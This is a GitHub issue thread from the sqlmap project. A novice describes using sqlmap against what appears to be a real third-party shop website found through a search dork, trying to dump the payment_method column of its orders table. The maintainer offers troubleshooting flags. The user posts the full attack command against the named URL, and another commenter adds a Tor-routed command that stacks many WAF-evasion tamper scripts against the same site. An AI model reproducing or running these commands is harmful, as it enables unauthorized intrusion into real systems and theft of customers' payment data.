### ISSUE TITLE
Column --dump produces NULL values instead of real information

### ISSUE THREAD

**Issue by AnguishSQL** [sqlmapproject/sqlmap#2260]
Hi, I've just started using SQLMap and I've successfully located a vulnerable website, found their list of databases, gotten all included tables and columns to show for me, but whenever I request a --dump from one of these columns, I'm met with nulls. I see there is a UNION error, is this my problem? If so, how do I fix it? Remember, I'm new. Thanks in advance. [http://prntscr.com/d29qqq](url)

Edit: http://prntscr.com/d29u4r Here's the command sequence I used to throw this error.

**Comment by stamparm** [comment]
Any warnings or error messages from sqlmap? What do you see in traffic file
(-t traffic.txt) during such run?

**Comment by AnguishSQL** [comment]
[15:10:58] [INFO] fetching entries of column(s) 'payment_method' for table 'orders' in database 'cl51-mototech'
# **[15:10:58] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique**
[15:10:58] [INFO] fetching number of column(s) 'payment_method' entries for table 'orders' in database 'cl51-mototech'
[15:10:58] [INFO] resumed: 43
[15:10:58] [INFO] analyzing table dump for possible password hashes

**Comment by AnguishSQL** [comment]
This site has 3 different vulnerabilities detected, could I use a different one other than UNION if that's what is causing the issue I'm having?

**Comment by stamparm** [comment]
Please, I don't want to ask zillion questions for you to remember that
sqlmap nagged about some other warning/error. How can I reproduce this? As
you can imagine, I am not able to reproduce this on a testing machine?
Also, you haven't told what DBMS is it. Have you tried --no-cast?

**Comment by stamparm** [comment]
You can force another technique with --technique.

**Comment by stamparm** [comment]
My lucky guess is that you don't have permissions to dump from that table

**Comment by AnguishSQL** [comment]
You could try this python sqlmap.py -u http://www.mototechniks.com/shop_category.php?category=7 -D cl51-mototech -T orders -C payment_method --dump  ......Site is inactive, shouldn't matter. I'm just testing with this site because I found it inurl.

**Comment by universells** [comment]
`

> sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 -v 2 -u "http://www.mototechniks.com/shop_category.php?category=7" --dbs --random-agent --level=5 --risk=3 --timeout=10 --time-sec=10 --no-cast --threads=10 --delay=1 --skip-waf --dbms=mysql --os=linux --keep-alive --technique=BEUST --eta  --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

`
